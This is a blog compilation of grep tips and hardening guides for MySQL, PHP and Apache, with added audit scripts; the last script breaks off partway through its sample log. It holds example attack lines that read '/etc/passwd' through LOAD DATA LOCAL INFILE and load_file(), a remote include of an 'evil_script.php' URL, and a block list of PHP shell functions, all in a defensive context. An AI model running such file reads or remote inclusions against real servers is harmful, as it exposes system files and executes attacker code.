The Magic of the `grep` command

  1. List the files that contain a string

    grep -ril python ./

    (-l prints file names instead of matching lines; -r is required here, since grep on a directory without it only reports "Is a directory".)
  2. Search a string recursively in all directories

    grep -r "function" .
  3. Match the whole word only (RUNNING, but not RUNNINGX)

    grep -w "RUNNING" FILENAME
  4. Search and replace in all files

    grep -rlZ 'old text' . | xargs -0 sed -i 's/old text/new text/g'

    (-Z and -0 pass the file names NUL-terminated, so names containing spaces survive the pipeline; both options are GNU grep/xargs, and -i is GNU sed.)
  5. Search and replace in a specified file

    find . -name myconfig_file.txt -print0 | xargs -0 sed -i 's/old text/new text/g'
  6. Search for a word in a file, with line numbers

    grep -n "Error" logfile.txt
  7. Case insensitive search

    grep -i "string" FILE
  8. Display N lines after the match

    grep -A N "string" FILENAME
  9. Display N lines before the match

    grep -B N "string" FILENAME
  10. Display N lines around the match

    grep -C N "string" FILENAME
  11. Counting the number of matches

    grep -c "pattern" filename
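The one-liners above run against a constructed set of files, as an added example that is not part of the original post. It assumes GNU grep, xargs and sed, and shows why the search-and-replace pipeline needs -Z/-0 when file names contain spaces (the "svc one" directory below), as well as the difference between -c, -w and -A:

```shell
#!/bin/sh
# Added example, not from the original post: the grep one-liners applied to a
# constructed set of files, written so that file names with spaces survive the
# grep | xargs | sed pipeline. Assumes GNU grep, xargs and sed (-Z, -0r, sed -i).
set -eu

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
mkdir -p "$WORK/svc one" "$WORK/svc two"

# constructed sample data
printf 'state=RUNNING\nstate=RUNNINGX\nERROR disk full\nError auth failed\n' > "$WORK/svc one/app.log"
printf 'host=old text\nmode=old text\n' > "$WORK/svc one/config.ini"
printf 'host=old text\n' > "$WORK/svc two/config.ini"
printf 'nothing to see\n' > "$WORK/svc two/readme.txt"

# -c counts matching LINES, not occurrences; -i folds case, so ERROR and Error both count
count_error_lines() { grep -ci 'error' "$WORK/svc one/app.log"; }

# -w matches whole words only: RUNNINGX must not count
count_running() { grep -cw 'RUNNING' "$WORK/svc one/app.log"; }

# -A N prints N lines of context after each match (here: the line after ERROR)
after_error() { grep -A 1 'ERROR' "$WORK/svc one/app.log" | tail -n 1; }

# Search and replace across the tree: -l lists files, -r recurses, -Z ends each
# name with NUL so xargs -0 copes with "svc one"; -r makes xargs skip sed when
# nothing matched. Prints the number of files that now contain the new string.
replace_everywhere() {
    grep -rlZ -- 'old text' "$WORK" | xargs -0r sed -i 's/old text/new text/g'
    grep -rl -- 'new text' "$WORK" | wc -l | tr -d ' '
}

# After the replacement no file may still contain the old string
files_with_old_text() { grep -rl -- 'old text' "$WORK" | wc -l | tr -d ' '; }

echo "error lines: $(count_error_lines), whole-word RUNNING: $(count_running)"
echo "files rewritten: $(replace_everywhere), still containing old text: $(files_with_old_text)"
```

Without -Z/-0 the same pipeline would hand sed the two words "svc" and "one/config.ini" as separate file names and fail on both; without -w the RUNNINGX line would be counted as a RUNNING match.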
Categories: Rochak Chauhan

Security and Hardening Tips for MySQL

  1. Disable or restrict remote access


    Consider whether MySQL will be accessed from the network or only from its own server. If remote access is used, ensure that only defined hosts can reach the server. This is typically done through TCP wrappers, iptables, or any other firewall software or hardware. To stop MySQL from opening a network socket at all, add the following parameter to the [mysqld] section of my.cnf or my.ini:

    skip-networking

    The file is located in the "C:\Program Files\MySQL\MySQL Server 5.1" directory on Windows, or at /etc/my.cnf or /etc/mysql/my.cnf on Linux.

    This line disables the initiation of networking during MySQL startup. Please note that a local connection can still be established to the MySQL server.

    Another possible solution is to force MySQL to listen only to the localhost by adding the following line in the [mysqld] section of my.cnf

    bind-address=127.0.0.1

    You may not be willing to disable network access to your database server if users in your organization connect to the server from their machines or the web server installed on a different machine. In that case, the following restrictive grant syntax should be considered:

    mysql> GRANT SELECT, INSERT ON mydb.* TO 'someuser'@'somehost';

  2. Disable the use of LOCAL INFILE


    The next change is to disable the "LOAD DATA LOCAL INFILE" statement. The LOCAL keyword makes the MySQL client, not the server, read the file. In a typical web stack that client is the web server running the PHP application, so a SQL injection flaw in the application can be turned into a read of arbitrary files on the web server host; this is why the setting matters whenever a new SQL injection vulnerability in a PHP application turns up. (The reverse also holds: a MySQL server under an attacker's control can request files from any client that connects with LOCAL INFILE enabled, so clients should disable it on their side too.)

    For example, the following statement copies the client host's "/etc/passwd" into a table:

    mysql> LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE table1;

    A related, server-side read is:

    mysql> SELECT load_file('/etc/passwd');

    Note that load_file() is not affected by the local-infile setting at all: it reads files on the database server itself and is governed by the FILE privilege and the secure_file_priv option. Keep FILE out of application accounts (see item 6) and point secure_file_priv at a dedicated directory, or set it to NULL to disable file import and export entirely.

    To disable "LOCAL INFILE", add the following parameter to the [mysqld] section of the MySQL configuration file:

    local-infile=0

    Older guides write this as set-variable=local-infile=0; the set-variable prefix is an obsolete spelling that was removed in MySQL 5.5.

  3. Change root username and password


    The default administrator username on the MySQL server is “root”. Hackers often attempt to gain access to its permissions. To make this task harder, rename “root” to something else and provide it with a long, complex alphanumeric password.

    To rename the administrator’s username, use the rename command in the MySQL console:

    mysql> RENAME USER 'root'@'localhost' TO 'new_user'@'localhost';

    Give the host part explicitly: without it MySQL assumes '%', which is not the account a default installation creates. Repeat for any other root rows (for example 'root'@'127.0.0.1') listed by SELECT user, host FROM mysql.user.

    The MySQL “RENAME USER” command first appeared in MySQL version 5.0.2. If you use an older version of MySQL, you can use other commands to rename a user:

    mysql> use mysql;
    mysql> update user set user="new_user" where user="root";
    mysql> flush privileges;
    

    To change a user's password, use the following statement at the MySQL prompt (the host part must match the account exactly):

    mysql> SET PASSWORD FOR 'username'@'hostname' = PASSWORD('newpass');

    This form is deprecated as of MySQL 5.7.6 and gone in 8.0, where the password is set with ALTER USER 'username'@'hostname' IDENTIFIED BY 'newpass' instead.
    

    It is also possible to change the password using the “mysqladmin” utility:

    shell> mysqladmin -u username -p password newpass
    

  4. Remove the “test” database


    MySQL comes with a "test" database intended as a test space. On versions before 5.7 the default grant tables give every account, including the anonymous user, full rights on it, so it is a favourite foothold for attacks.

    To remove this database, use the drop command as follows:

    mysql> drop database test;
    
    Or use the "mysqladmin" command:
    
    shell> mysqladmin -u username -p drop test
    

  5. Remove Anonymous and obsolete accounts

    The MySQL database comes with anonymous user accounts that have blank passwords. As a result, anyone can connect to the server without credentials. To check whether this is the case, run:

    mysql> select * from mysql.user where user="";

    In a secure system, no lines should be echoed back. Another way to do the same:

    mysql> SHOW GRANTS FOR ''@'localhost';
    mysql> SHOW GRANTS FOR ''@'myhost';
    

    If such grants exist, anybody can connect and at least use the default database "test". Check this by connecting with a user name that does not exist, which the server maps to the anonymous account:

    shell> mysql -u blablabla
    

    To remove the account, execute the following command:

    mysql> DROP USER ''@'localhost';

    Repeat this for every host shown for the empty user name in the query above (DROP USER '' with no host part refers to ''@'%').
    

    The MySQL “DROP USER” command is supported starting with MySQL version 5.0. If you use an older version of MySQL, you can remove the account as follows:

    mysql> use mysql;
    mysql> DELETE FROM user WHERE user="";
    mysql> flush privileges;
    
  6. Lower database privileges


    In most cases, there is an administrator user (the renamed "root") and one or more application users who coexist in the database. Usually, "root" has nothing to do with the data in the database; instead, it is used to maintain the server and its tables, to give and revoke permissions, and so on.

    On the other hand, some user ids are used to access the data, such as the user id assigned to the web server to execute “select\update\insert\delete” queries and to execute stored procedures. In most cases, no other users are necessary; however, only you, as a system administrator can really know your application’s needs.

    Only administrator accounts need the SUPER, PROCESS and FILE privileges and access to the mysql database; FILE in particular lets an account read and write files on the database server host. Application accounts should never receive these, nor GRANT OPTION. Usually, it is also a good idea to lower the administrator's permissions for accessing the data.

    Review the privileges of the rest of the users and ensure that these are set appropriately. This can be done using the following steps.

    mysql> use mysql;

    [Identify users]

    mysql> SELECT user, host FROM mysql.user;

    [List grants of each user]

    mysql> SHOW GRANTS FOR 'root'@'localhost';
    

    The SHOW GRANTS statement has to be executed for each user and host pair listed! Note that only users who really need root-level privileges should be granted them.

    Another interesting privilege is SHOW DATABASES. By default, the statement can be used by everyone with access to the MySQL prompt; attackers use it to gather database names before going after the data. To prevent this, do both of the following:

    • Add --skip-show-database to the startup options of mysqld, or the equivalent line to the MySQL configuration file.
    • Grant the SHOW DATABASES privilege only to the users you want to be able to run the statement.

    With skip-show-database in place, only accounts holding the SHOW DATABASES privilege may run the statement at all; everyone else gets an error. Add the following to the [mysqld] section of /etc/my.cnf:

    [mysqld]
    skip-show-database
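A check for the configuration-file side of items 1, 2 and 6, as an added example that is not part of the original post: it parses the [mysqld] section of a my.cnf and reports whether skip-networking or bind-address=127.0.0.1, local-infile=0 and skip-show-database are actually in effect. It needs no running server; the weak and hardened files below are constructed samples, and the parser deliberately accepts the obsolete set-variable= spelling and the underscore/dash variants that mysqld treats as equivalent, since both turn up in real files:

```shell
#!/bin/sh
# Added example, not from the original post: audit the [mysqld] section of a
# my.cnf for the startup-time directives from items 1, 2 and 6 above. It reads
# the file only, so no MySQL server is needed; the two configurations written
# below are constructed samples.
set -eu

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# A weak file: listens everywhere, LOCAL INFILE on, SHOW DATABASES open to all.
cat > "$WORK/weak.cnf" <<'EOF'
[client]
port = 3306

[mysqld]
port = 3306
datadir = /var/lib/mysql
# skip-networking   <- commented out, so it must not count
local-infile = 1
EOF

# A hardened file, using the obsolete set-variable= spelling and an underscore
# variant on purpose; older mysqld builds accept both.
cat > "$WORK/hardened.cnf" <<'EOF'
[mysqld]
bind-address = 127.0.0.1
set-variable=local_infile=0
skip_show_database
EOF

# mycnf_get FILE DIRECTIVE: print DIRECTIVE's value from [mysqld] ("set" for a
# bare flag, nothing if absent). Names are normalised so foo_bar == foo-bar,
# which is how mysqld itself treats option names.
mycnf_get() {
    awk -v want="$2" '
        /^[ \t]*\[/ { in_mysqld = ($0 ~ /^[ \t]*\[mysqld\][ \t]*$/); next }
        !in_mysqld || /^[ \t]*([#;]|$)/ { next }
        {
            line = $0
            sub(/[ \t]*#.*$/, "", line)                  # trailing comment
            sub(/^[ \t]+/, "", line); sub(/[ \t]+$/, "", line)
            n = index(line, "=")
            key = n ? substr(line, 1, n - 1) : line
            val = n ? substr(line, n + 1) : "set"
            if (key ~ /^set[-_]variable[ \t]*$/) {       # old "set-variable=name=value" form
                n = index(val, "=")
                key = substr(val, 1, n - 1); val = substr(val, n + 1)
            }
            gsub(/[ \t]/, "", key); gsub(/_/, "-", key)
            sub(/^[ \t]+/, "", val); sub(/[ \t]+$/, "", val)
            if (key == want) print val
        }' "$1"
}

# audit_mycnf FILE: one PASS/FAIL line per check
audit_mycnf() {
    f=$1
    if [ -n "$(mycnf_get "$f" skip-networking)" ] || [ "$(mycnf_get "$f" bind-address)" = "127.0.0.1" ]; then
        echo "PASS network: mysqld does not accept connections from other hosts"
    else
        echo "FAIL network: mysqld will listen on all interfaces; set skip-networking or bind-address=127.0.0.1"
    fi
    if [ "$(mycnf_get "$f" local-infile)" = "0" ]; then
        echo "PASS local-infile: LOAD DATA LOCAL INFILE disabled"
    else
        echo "FAIL local-infile: LOAD DATA LOCAL INFILE allowed; set local-infile=0"
    fi
    if [ -n "$(mycnf_get "$f" skip-show-database)" ]; then
        echo "PASS skip-show-database: SHOW DATABASES requires the privilege"
    else
        echo "FAIL skip-show-database: every account can list databases"
    fi
}

# fail_count FILE: number of FAIL lines (0 means all three checks pass)
fail_count() { audit_mycnf "$1" | grep -c '^FAIL' || true; }

audit_mycnf "$WORK/weak.cnf"
audit_mycnf "$WORK/hardened.cnf"
```

Point audit_mycnf at /etc/my.cnf or /etc/mysql/my.cnf to check a real host; a directive that appears in the file but outside [mysqld], or behind a comment character, is correctly reported as missing, which is a common way these settings silently fail to apply.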
    

  7. Enable Logging


    If your database server does not execute many queries, it is worth enabling the general query log, which records every statement the server receives, by adding the following line to the [mysqld] section of /etc/my.cnf:

    [mysqld]
    log=/var/log/mylogfile

    (The bare log option is the MySQL 5.0/5.1 spelling; it was removed in 5.6, where the same log is configured with general_log=1 and general_log_file=/var/log/mylogfile.)
    

    This is not recommended for heavy production MySQL servers because it causes high overhead on the server.

    In addition, verify that only the "root" and "mysql" users can read these log files and that nobody else can write to them: the general query log records statements as received, including SET PASSWORD and GRANT statements (older versions log the passwords in them in clear text; 5.6 and later rewrite them out by default).

    Error log

    Ensure only "root" and "mysql" have access to the log file "hostname.err", which is stored in the mysql data directory. This file can contain very sensitive information such as passwords, addresses, table names, stored procedure names and fragments of code. It can be used for information gathering and, in some cases, gives an attacker the information needed to exploit the database, the machine it runs on, or the data inside it.

    MySQL log

    Ensure only "root" and "mysql" have access to the general query log configured above (/var/log/mylogfile in the example); if no path is given it is written to the mysql data directory.

  8. Optimizing Performance


    Set max_connections to the number of concurrent connections you need. The default value is only 100 connections, which is very small.

    Note: connections take memory and your OS might not be able to handle a lot of connections. MySQL binaries for Linux/x86 allow you to have up to 4096 concurrent connections, but self-compiled binaries often have a lower limit.

    Set table_cache to match the number of your open tables and concurrent connections. Watch the open_tables value and if it is growing quickly you will need to increase its size.

    Note: the two previous parameters may require a lot of open files. 20 + max_connections + table_cache * 2 is a good estimate for what you need. MySQL on Linux has an open_files_limit option to set this limit.

    If you have complex queries, sort_buffer_size and tmp_table_size are likely to be very important. Values will depend on the query complexity and available resources, but 4 MB and 32 MB, respectively, are recommended starting points.

    Note: these are "per connection" values, like read_buffer_size, read_rnd_buffer_size and some others, meaning that this amount of memory may be needed for each connection. So consider your load and available resources when setting these parameters. For example, sort_buffer_size is allocated only if MySQL needs to do a sort. Be careful not to run out of memory.

    If you have many connections being opened and closed (e.g. a web site without persistent connections) you might improve performance by setting thread_cache_size to a non-zero value. 16 is a good value to start with. Increase the value until your threads_created counter stops growing quickly.

  9. Index the Search Fields


    Indexes are not just for the primary keys or the unique keys. If there are any columns in your table that you will search by, you should almost always index them.

    This rule also applies to a partial string search like "last_name LIKE 'a%'". When searching from the beginning of the string, MySQL is able to use the index on that column.

    You should also understand which kinds of searches can not use the regular indexes. For instance, when searching for a word (e.g. “WHERE post_content LIKE ‘%apple%’”), you will not see a benefit from a normal index. You will be better off using mysql fulltext search or building your own indexing solution.

  10. Enable the slow query log


    MySQL prior to 5.1.0 requires a change to the my.cnf file and a restart in order to log slow queries; from MySQL 5.1.0 you can change this dynamically without having to restart.

    To make the change permanent whenever the MySQL server is started, and for MySQL prior to 5.1.0, edit your my.cnf file (on Linux boxes this is usually /etc/my.cnf or /etc/mysql/my.cnf) and uncomment the "log_slow_queries" line, or add it if it is not present. (log_slow_queries is the pre-5.6 name; MySQL 5.6 and later use slow_query_log=1 together with slow_query_log_file, and slow_query_log is also the variable to use in the SET GLOBAL statements below on those versions.)

    On a Debian box, for example, the line to uncomment looks like this:

    log_slow_queries = /var/log/mysql/mysql-slow.log
    

    You can change the log file name to something else or leave it blank so it uses the default. The default is to log the queries into a file in the MySQL data directory. On my Debian test box this was “mysqld-slow.log”.

    To enable or disable the setting dynamically in MySQL 5.1.0 run the following query to enable it:

    set global log_slow_queries = ON;
    

    and to disable it:

    set global log_slow_queries = OFF;
    

    Setting the long query time

    You can also specify how long a query needs to run for before it is logged, with the "long_query_time" setting. By default this is 10 seconds.

    In the my.cnf file, to change it to e.g. 5 seconds add the following:

    long_query_time = 5
    

    This can be changed dynamically in MySQL 5.0.0+ (and possibly earlier versions) by running the following query:

    set global long_query_time = 5;
    

    This will only work for new connections; any connections which have already been established will continue to use the old setting. Once the user disconnects and reconnects their new connection will use the new setting.

Categories: Technology, Tips and Tricks, Unethical Hacking

Security and Hardening Tips for PHP

  1. Disable sensitive functions in PHP


    Edit the php.ini file :

    sudo vi /etc/php5/apache2/php.ini

    Add or edit the following lines an save :

    disable_functions = exec,system,shell_exec,passthru,...  ; extend with the other process-spawning functions your code does not need
    register_globals = Off
    expose_php = Off
    display_errors = Off
    track_errors = Off
    html_errors = Off
    magic_quotes_gpc = Off
    

    Restart Apache server. Open a Terminal and enter the following :

    sudo /etc/init.d/apache2 restart

  2. Disable allow_url_fopen ( enabled by default )


    This directive lets PHP's file functions (file_get_contents, fopen and the like) fetch data from remote locations such as FTP or HTTP URLs. Since PHP 5.2 the include and require statements are governed by a separate directive, allow_url_include, which is Off by default; set both Off.

    If an attacker can manipulate the arguments to those functions, they can point them at a URL under their control and have the server fetch, or with include/require execute, their own remote script. The vulnerability is called Remote File Inclusion (RFI).

    ; Disable allow_url_fopen (and allow_url_include) in php.ini for security reasons
    allow_url_fopen = Off
    allow_url_include = Off

    The setting can also be applied in apache’s httpd.conf :

    # Disable allow_url_fopen and allow_url_include for security reasons
    php_admin_flag allow_url_fopen Off
    php_admin_flag allow_url_include Off

    This prevents URLs from being used in PHP's file functions. A statement like include("http://www.example.com/evil_script.php") will no longer fetch and execute the remote file; only files on the local filesystem can be included, e.g. include("/var/www/html/config.inc.php").

    NOTE: A large number of code injection vulnerabilities reported in PHP web applications are caused by enabling allow_url_fopen and bad input filtering. You should disable this directive for security reasons.

  3. Disable Display Errors


    The display_errors directive determines whether error messages should be sent to the browser. These messages frequently contain sensitive information about your web application environment and should always be disabled.

    ; Disable display_errors in php.ini for security reasons
    display_errors = Off
    log_errors = On

    The setting can also be disabled in apache’s httpd.conf or .htaccess file:

    # Disable display_errors for security reasons
    php_flag display_errors Off
    php_flag log_errors On

    NOTE: display_errors should be disabled and all error messages should be passed to system log files using the log_errors directive.

  4. Disable magic_quotes


    magic_quotes_gpc provides some rudimentary protection against SQL injection, but it is a generic solution that does not cover all the characters that require escaping. It effectively runs addslashes() on all information received through COOKIE, GET and POST. Because it is inconsistent and ineffective, it is recommended to disable magic_quotes_gpc (the feature was removed altogether in PHP 5.4) and rely on the input filtering and parameterised queries in your own scripts.

    ; Disable Magic Quotes in php.ini for security reasons
    magic_quotes_gpc = Off
    
    # The setting can also be applied in apache's httpd.conf or .htaccess file:
    php_flag magic_quotes_gpc Off

    NOTE: If the magic_quotes_sybase directive is also On it completely overrides magic_quotes_gpc. Having both directives enabled means only single quotes are escaped, as '' (two single quotes). Double quotes, backslashes and NULs remain untouched and unescaped.

  5. Disable register_globals


    A number of older scripts assume that the data sent by a form will automatically have a PHP variable of the same name.

    If your form has an input field with a name of “somename”, older PHP scripts assume that the PHP will automatically create a variable called $somename that contains the value set in that field.

    ; Disable register globals in php.ini for security reasons
    register_globals = Off

    The setting can also be applied in apache’s httpd.conf or .htaccess file:

    # Disable register globals for security reasons
    php_flag register_globals Off

    NOTE: Register Globals should always be disabled (the directive was removed in PHP 5.4; on older versions it must be switched off explicitly).

  6. Protect PHP Sessions


    Protect session IDs from being read by script (and so from being stolen through an XSS bug) by marking the session cookie HttpOnly:

    session.cookie_httponly = 1

    HttpOnly does nothing against session IDs that end up in links people post online or send to friends; those come from IDs carried in URLs, which the next item turns off. Also add a referer check, so that requests whose Referer header does not contain your site name do not resume a session:

    session.referer_check = yourwebsite.com

    You should also set session.save_path to a directory that only the web server user can read and that is not shared with other sites or users on the machine: with the default, often the system /tmp, anyone with a local account can list the session files and so obtain live session IDs. E.g.:

    session.save_path = /var/lib/php

  7. Disable use_trans_sid


    When use_trans_sid is enabled, PHP will add a unique PHPSESSID query pair to URIs within your site if cookies are not available and session.use_trans_sid is set. This makes it far easier for a malicious party to obtain an active session ID and hijack the session. It’s recommended to disable use_trans_sid in your PHP environment.

    ; Disable use_trans_sid for security reasons
    session.use_trans_sid = Off
    

    The setting can also be disabled in apache’s httpd.conf or .htaccess file:

    # Disable use_trans_sid for security reasons
    php_flag session.use_trans_sid Off
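A way to verify from the outside that the expose_php (item 1) and session cookie (item 6) changes took effect, as an added example that is not part of the original post. It does what a "curl -I" check of the response headers would do, but on two constructed responses (a default install and a hardened one) so it runs offline; feed real headers to the same functions to audit your own server. The Secure cookie flag check goes beyond the text above but belongs with HttpOnly on any site served over HTTPS:

```shell
#!/bin/sh
# Added example, not from the original post: audit HTTP response headers for the
# php.ini settings discussed above. The two responses are constructed samples.
set -eu

DEFAULT_RESPONSE='HTTP/1.1 200 OK
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10
Set-Cookie: PHPSESSID=3f9c0b0d1c7e4c8a; path=/
Content-Type: text/html'

HARDENED_RESPONSE='HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=9ad2e1b44c0f7d6e; path=/; HttpOnly; Secure
Content-Type: text/html'

# header_value HEADERS NAME: value of the first NAME header (case-insensitive), or nothing
header_value() {
    printf '%s\n' "$1" | awk -v name="$2" -F': ' '
        tolower($1) == tolower(name) { print substr($0, index($0, ": ") + 2); exit }'
}

# session_cookie_flags HEADERS: attributes of the PHPSESSID cookie, one per line, lower-cased
session_cookie_flags() {
    printf '%s\n' "$1" | awk -F'; ' '
        tolower($0) ~ /^set-cookie: phpsessid=/ { for (i = 2; i <= NF; i++) print tolower($i) }'
}

# audit_headers HEADERS: one PASS/FAIL line per setting
audit_headers() {
    h=$1
    powered=$(header_value "$h" X-Powered-By)
    if [ -n "$powered" ]; then
        echo "FAIL expose_php: X-Powered-By reveals $powered"
    else
        echo "PASS expose_php: no X-Powered-By header"
    fi
    flags=$(session_cookie_flags "$h")
    if printf '%s\n' "$flags" | grep -qx httponly; then
        echo "PASS session.cookie_httponly: PHPSESSID not readable by script"
    else
        echo "FAIL session.cookie_httponly: PHPSESSID readable by script"
    fi
    if printf '%s\n' "$flags" | grep -qx secure; then
        echo "PASS session.cookie_secure: PHPSESSID only sent over HTTPS"
    else
        echo "FAIL session.cookie_secure: PHPSESSID also sent over plain HTTP"
    fi
}

# fail_count HEADERS: number of FAIL lines (0 means every check passed)
fail_count() { audit_headers "$1" | grep -c '^FAIL' || true; }

audit_headers "$DEFAULT_RESPONSE"
audit_headers "$HARDENED_RESPONSE"
```

The hardened sample also shows the "Server: Apache" header that ServerTokens Prod produces (see the Apache section below); the check is deliberately on what the server actually sends, since a php.ini edit in the wrong file or SAPI changes nothing on the wire.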

  8. Make use of correct php.ini file


    Each PHP installation ships two template php.ini files, "php.ini-production" and "php.ini-development".
    There are quite a number of opinions on what should be enabled and what should be disabled. Most of the disagreement arises from the conflict of interest between those using PHP in production and those using it for development. Developers want display_errors on and want to see E_NOTICE and E_STRICT errors, while those who run PHP in production would rather log errors to a log file or syslog, and then nothing but the most critical of errors.

    Main difference between the values of these two versions of files are

    	short_open_tag
    	disable_functions 	
    	memory_limit
    	session.gc_probability 
    	display_startup_errors 
    	track_errors
    	error_reporting
    

  9. Restrict File Uploads (Application Specific)


    If you’re not utilizing file upload functionality in any of your PHP scripts then it’s a good idea to turn it off. Attackers will attempt to (mis)use file uploads to quickly inject malicious scripts into your web applications. By disabling file uploads altogether this makes moving scripts onto your web server more difficult. To disable file uploads change the file_uploads directive in your php.ini to read:

    file_uploads = Off

    Even if you do allow file uploads you should change the default temporary directory used for file uploads. This can be done by changing the upload_tmp_dir directive. You may also want to restrict the size of files that can be uploaded. This is usually more of a system administration alteration than a security fix, but it can be useful. Use the upload_max_filesize directive for this purpose. To restrict upload directories and file sizes change your php.ini so that it reads:

    upload_tmp_dir = /var/php_tmp
    upload_max_filesize = 2M
    

  10. Analyse PHP Setting using “PhpSecInfo”

    PhpSecInfo provides an equivalent to the phpinfo() function that reports security information about the PHP environment, and offers suggestions for improvement. It is not a replacement for secure development techniques, and does not do any kind of code or app auditing, but can be a useful tool in a multilayered security approach.

    Ref: http://phpsec.org/projects/phpsecinfo/

Categories: PHP, Technology, Tips and Tricks, Unethical Hacking

Security and Hardening Tips for Apache

  1. Use mod_security and mod_evasive Modules to Secure Apache


    mod_security works as a firewall for web applications (a WAF): it inspects requests in real time against a rule set and can block, for example, injection attempts and brute-force logins against your websites. You can install it with your distribution's package manager.

    Install mod_security on Ubuntu

    These commands will install dependencies:

    sudo apt-get install libxml2 libxml2-dev libxml2-utils
    sudo apt-get install libaprutil1 libaprutil1-dev
    

    If you are using 64 bit Ubuntu run this command:

    ln -s /usr/lib/x86_64-linux-gnu/libxml2.so.2 /usr/lib/libxml2.so.2
    

    This command will install mod security:

    sudo apt-get install libapache-mod-security

    Configuring ModSecurity Rules

    mv /etc/modsecurity/modsecurity.conf-recommended /etc/modsecurity/modsecurity.conf
    

    now for configuring the modsecurity run the following command.

    gedit /etc/modsecurity/modsecurity.conf

    Now find SecRuleEngine in the file and change it to On. The recommended file ships with DetectionOnly, which logs matches but does not block; switch to On once the rules have been tuned against your application, or legitimate requests will be rejected.

    SecRuleEngine On

    Mod_evasive

    mod_evasive takes a different approach: it tracks requests per client IP address and temporarily blocks clients whose request rate looks like a flood, which limits the damage of HTTP brute-force and DoS attacks (and, to a degree, DDoS). Install it from your distribution's packages like mod_security. A client is blocked when any of three conditions holds:

    • It requests the same page more than a set number of times within the interval (DOSPageCount / DOSPageInterval).
    • It makes more than a set number of requests to the site as a whole within the interval (DOSSiteCount / DOSSiteInterval, 50 by default).
    • It keeps sending requests while it is temporarily blacklisted.
  2. Do not allow browsing outside the document root


    Allowing browsing outside the document root is inviting trouble. Unless you have a specific need to allow it, disable this feature. First, deny everything starting at the filesystem root, so that nothing outside the document root can be served, and switch off options and .htaccess overrides there:

    <Directory />
        Order Deny,Allow
        Deny from all
        Options None
        AllowOverride None
    </Directory>

    Now, if you need to add options to any directory within the document root, you will have to add a new Directory entry for each one, starting with the document root itself, where access is granted again (Allow from all; on Apache 2.4 the Order/Deny/Allow directives are replaced by Require all denied and Require all granted).

  3. Hide Apache’s version number


    One of the easiest pieces of information to withhold is the Apache version number. Hiding it fixes no vulnerability, but it keeps automated scanners and casual attackers from matching your server to known exploits at a glance. To hide it, add the following to the main server configuration (ServerTokens is only valid at server level, not inside a Directory section or .htaccess):

    ServerSignature Off
    ServerTokens Prod

  4. Enable Apache Logging


    Apache can log independently of your OS logging. It is wise to enable Apache logging, because it records every request clients make to your web server, which is what you will need for any incident investigation.

    To do so you need to include the mod_log_config module. There are three main logging-related directives available with Apache.

    • TransferLog: Creating a log file.
    • LogFormat : Specifying a custom format.
    • CustomLog : Creating and formatting a log file.

    You can also use them for a particular website if you are doing virtual hosting; for that you specify them in the virtual host section. For example, here is a website virtual host configuration with logging enabled:

    <VirtualHost *:80>
        DocumentRoot /var/www/html/example.com/
        ServerName www.example.com
        DirectoryIndex index.htm index.html index.php
        ServerAlias example.com
        ErrorDocument 404 /story.php
        ErrorLog /var/log/httpd/example.com_error_log
        CustomLog /var/log/httpd/example.com_access_log combined
    </VirtualHost>

  5. Immunize httpd.conf


    One of the simplest safeguards is to make httpd.conf immutable: with the immutable bit set, the file cannot be modified, renamed or deleted, not even by root, until the bit is cleared again. To set it:

    chattr +i /path/to/httpd.conf

    where /path/to/httpd.conf is the path to your Apache configuration file. Note that this guards against accidental edits and scripted tampering, not against an attacker who already has root and can run chattr -i; the file stays readable, which Apache needs, and you must clear the bit yourself before every legitimate change.

  6. Protect DDOS attacks and Hardening


    Well, it's true that you cannot completely protect your web site from DDoS attacks. Here are some directives which can help you keep them under control.

    • TimeOut: the amount of time the server will wait for certain events to complete before it fails the request. Its default value is 300 seconds in Apache 2.2 (60 in 2.4). It's good to keep this value low on sites which are subject to DDoS attacks; the right value depends entirely on the kind of requests your website gets. Note: it could pose problems with some CGI scripts.
    • MaxClients: the limit on connections that will be served simultaneously; every new connection beyond it is queued. It is available with both the Prefork and Worker MPM, and its default value is 256 (Apache 2.4 calls it MaxRequestWorkers).
    • KeepAliveTimeout: the amount of time the server will wait for a subsequent request before closing the connection. Default value is 5 seconds.
    • LimitRequestFields: the limit on the number of HTTP request header fields accepted from clients. Its default value is 100. It is recommended to lower this value if attacks arrive as requests carrying very many headers.
    • LimitRequestFieldSize: the size limit on a single HTTP request header field (default 8190 bytes).
  7. Disable Trace HTTP Request


    With the default TraceEnable on, Apache answers TRACE requests (which per RFC 2616 carry no request body) by echoing the received request back to the client. TraceEnable off causes the core server and mod_proxy to return a 405 (Method Not Allowed) error instead.

    Leaving TRACE enabled allows Cross-Site Tracing (XST): a script that manages to send a TRACE request sees the echoed request, including the Cookie header, which is one way around the HttpOnly cookie flag.

    Solution:

    Address this issue by disabling the TRACE HTTP method in the Apache configuration. Modify or add the directive below in the httpd.conf of your Apache web server and restart it.

    # vi httpd.conf

    TraceEnable off
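Once the CustomLog from item 4 is writing a combined-format log, that file is where the effect of items 1, 7 and 8 shows up: TRACE probes (answered 405 when TraceEnable is off, 2xx when it is not), 403s from the rewrite allowlist, and the per-IP bursts mod_evasive reacts to. The following detection pass over such a log is an added example, not part of the original post; the log entries are constructed, and the burst rule reimplements the DOSPageCount/DOSPageInterval condition rather than calling mod_evasive:

```shell
#!/bin/sh
# Added example, not from the original post: what the combined access log from
# item 4 reveals about TRACE, the 403 allowlist and request floods. The entries
# below are constructed, not a real server's log; replace the here-document
# with the contents of your own access log to run the same checks.
set -eu

LOG=$(cat <<'EOF'
198.51.100.4 - - [10/Oct/2013:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 2326 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2013:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 2326 "-" "python-requests/2.0"
203.0.113.7 - - [10/Oct/2013:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 2326 "-" "python-requests/2.0"
203.0.113.7 - - [10/Oct/2013:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 2326 "-" "python-requests/2.0"
203.0.113.7 - - [10/Oct/2013:13:55:37 +0000] "GET /config.php HTTP/1.1" 403 199 "-" "python-requests/2.0"
198.51.100.9 - - [10/Oct/2013:13:55:38 +0000] "TRACE / HTTP/1.1" 405 0 "-" "curl/7.22.0"
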